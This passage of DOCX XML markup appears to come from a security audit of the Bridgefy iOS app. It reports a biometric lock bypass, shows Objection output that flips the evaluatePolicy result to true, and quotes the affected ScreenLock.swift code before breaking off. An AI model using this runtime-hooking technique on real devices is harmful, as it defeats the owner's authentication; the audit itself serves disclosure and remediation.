          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2989"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2587402" cy="3108674"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="Image 42"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="42" name="Image 42"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2587402" cy="3108674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="108"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Biometric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>portion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can now navigate all screens without access to the fingerprint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Objection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="475" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(agent)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[314141]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Localized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requirement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(evaluatePolicy):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authenticate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>open Bridgefy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(agent) [314141] OS authentication response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(agent) [314141] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Marking OS response as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>True </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>instead</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(agent) [314141] Biometrics bypass hook complete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(evaluatePolicy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-ios/brid/Bridgefy/Utilities/ScreenLock.swift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="363" w:firstLine="395"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tryToUnlockScreenLock(completion:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@escaping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>((ScreenLockOutcome)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt; Void)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let context = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>screenLockContext()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>context.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>evaluatePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.deviceOwnerAuthentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="3787" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>localizedReason:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="1907" w:right="4309" w:hanging="1188"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>L10n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.Authentication.Local.reasonUnlockScreen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ success, authenticationError </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>success </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>completion(.success)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
